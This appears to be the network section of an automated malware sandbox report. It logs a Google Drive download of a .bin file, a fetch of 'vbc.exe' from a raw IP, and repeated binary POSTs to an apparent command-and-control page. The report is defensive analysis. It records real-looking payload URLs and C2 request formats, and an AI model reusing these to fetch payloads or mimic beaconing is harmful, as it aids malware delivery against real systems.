Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
doc-00-1c-docs.googleusercontent.com | 142.250.196.97 | |
drive.google.com | 142.250.199.110 | |
- TCP Requests
- UDP Requests
  - 192.168.56.101:59369 -> 164.124.101.2:53
  - 192.168.56.101:61479 -> 164.124.101.2:53
  - 192.168.56.101:62324 -> 164.124.101.2:53
  - 192.168.56.101:137 -> 192.168.56.255:137
  - 192.168.56.101:138 -> 192.168.56.255:138
  - 192.168.56.101:49152 -> 239.255.255.250:3702
  - 192.168.56.101:62326 -> 239.255.255.250:3702
  - 192.168.56.101:62445 -> 239.255.255.250:1900
  - 192.168.56.101:62447 -> 239.255.255.250:3702
  - 192.168.56.101:62449 -> 239.255.255.250:3702
  - 52.231.114.183:123 -> 192.168.56.101:123
GET 302 https://drive.google.com/uc?export=download&id=1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_

Request:
```http
GET /uc?export=download&id=1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: drive.google.com
Cache-Control: no-cache
```

Response:
```http
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 13 Sep 2021 09:32:27 GMT
Location: https://doc-00-1c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/44otpfku4m84nv2baa4uts53scs88sf5/1631525475000/14552286414405439806/*/1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_?e=download
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'nonce-JxHlZsUz8Yjk9BWnMN1z9g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Set-Cookie: NID=223=SEmY7DzAlrdyMluxEECa5vL79Wv9e3ZeHAlDl1VHqF3dXS3iAGlMT_bQGDosUxe8OPyZDS8lRR0hP088yCA0_FJ0CJIyG6RiPJn5S0SbPrYGdl7PTX6wNUg3ZFBr5Zs-ZOI9Cb0OENUuCaSbUpOCw3hh_ZEZJGmwvnNF-aU87QU; expires=Tue, 15-Mar-2022 09:32:27 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
```
GET 200 https://doc-00-1c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/44otpfku4m84nv2baa4uts53scs88sf5/1631525475000/14552286414405439806/*/1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_?e=download

Request:
```http
GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/44otpfku4m84nv2baa4uts53scs88sf5/1631525475000/14552286414405439806/*/1u_LDPUBD8svIuWN6M_dYDxV9pWS_PZM_?e=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
Host: doc-00-1c-docs.googleusercontent.com
```

Response:
```http
HTTP/1.1 200 OK
X-GUploader-UploadID: ADPycduspp9XvF4wKTXDNmNbPAvMjf1MkudOUkidaBoPXXfmFWhldFNJLshSrUMQY24nDFSgqnB1hBCqtyhcrrXLiDfU_b214A
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
Access-Control-Allow-Methods: GET,OPTIONS
Content-Type: application/octet-stream
Content-Disposition: attachment;filename="Mr stan_wTKBYXCRI130.bin";filename*=UTF-8''Mr%20stan_wTKBYXCRI130.bin
Date: Mon, 13 Sep 2021 09:32:28 GMT
Expires: Mon, 13 Sep 2021 09:32:28 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=jNYKKg==
Content-Length: 106560
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
```
GET 200 http://23.95.85.181/http/vbc.exe

Request:
```http
GET /http/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: 23.95.85.181
Connection: Keep-Alive
```

Response:
```http
HTTP/1.1 200 OK
Date: Mon, 13 Sep 2021 16:30:49 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Last-Modified: Mon, 13 Sep 2021 03:35:59 GMT
ETag: "12000-5cbd829e7035d"
Accept-Ranges: bytes
Content-Length: 73728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
```
POST 404 http://136.243.159.53/~element/page.php?id=429

Request:
```http
POST /~element/page.php?id=429 HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 136.243.159.53
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 305F273C
Content-Length: 186
Connection: close
```

Response:
```http
HTTP/1.1 404 Not Found
Date: Mon, 13 Sep 2021 09:32:30 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
```
POST 404 http://136.243.159.53/~element/page.php?id=429

Request:
```http
POST /~element/page.php?id=429 HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 136.243.159.53
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 305F273C
Content-Length: 186
Connection: close
```

Response:
```http
HTTP/1.1 404 Not Found
Date: Mon, 13 Sep 2021 09:32:31 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
```
POST 404 http://136.243.159.53/~element/page.php?id=429

Request:
```http
POST /~element/page.php?id=429 HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 136.243.159.53
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 305F273C
Content-Length: 159
Connection: close
```

Response:
```http
HTTP/1.1 404 Not Found
Date: Mon, 13 Sep 2021 09:32:32 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49210 172.217.25.238:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | ef:1f:1c:2c:41:c4:ed:3c:4e:60:4f:56:1b:ed:09:ba:e9:e1:39:2d |
TLSv1 192.168.56.101:49211 172.217.161.161:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.googleusercontent.com | c2:32:d6:56:55:c0:b4:21:45:21:7a:75:1d:7a:a2:fb:a5:1f:5f:ea |
Snort Alerts
No Snort Alerts